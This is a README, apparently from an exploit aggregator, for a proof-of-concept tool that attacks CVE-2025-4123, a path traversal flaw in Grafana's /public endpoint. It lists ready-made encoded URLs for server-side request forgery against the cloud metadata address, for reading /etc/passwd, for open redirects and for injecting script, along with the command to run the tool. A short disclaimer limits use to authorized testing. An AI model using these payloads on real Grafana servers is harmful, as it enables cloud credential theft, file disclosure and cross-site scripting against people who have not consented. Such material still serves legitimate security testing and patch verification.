Share 
## https://sploitus.com/exploit?id=5F7ABF34-7B76-5A69-A088-6BB7A1308E7E
# CVE-2025-4123 - Grafana Path Traversal Exploit

> Developed by **mitsec**

This is a proof-of-concept (PoC) exploit tool for **CVE-2025-4123**, a critical path traversal vulnerability in Grafana's `/public` endpoint. The exploit allows for:

- โœ… Server-Side Request Forgery (SSRF)
- โœ… Local File Inclusion (LFI)
- โœ… Open Redirect
- โœ… Cross-Site Scripting (XSS)

## ๐Ÿ”ฅ Affected

Grafana instances with `/public/` endpoint improperly handling encoded paths like:
```
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
```

---

## ๐Ÿš€ Usage

```bash
python3 cve_2025_4123_exploit_mitsec_final.py
```

Then select the desired mode:

1. SSRF - Internal services like `169.254.169.254`
2. LFI  - Read files like `/etc/passwd`
3. Open Redirect - Redirect to external domains
4. XSS - JavaScript injection in public path

---

## ๐Ÿงช Example

```bash
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
```

---

## ๐Ÿ“„ Disclaimer

This code is provided for educational and authorized testing purposes only. Unauthorized use against systems without consent is illegal.

---

## โœ๏ธ Author

- [mitsec](https://github.com/ynsmroztas)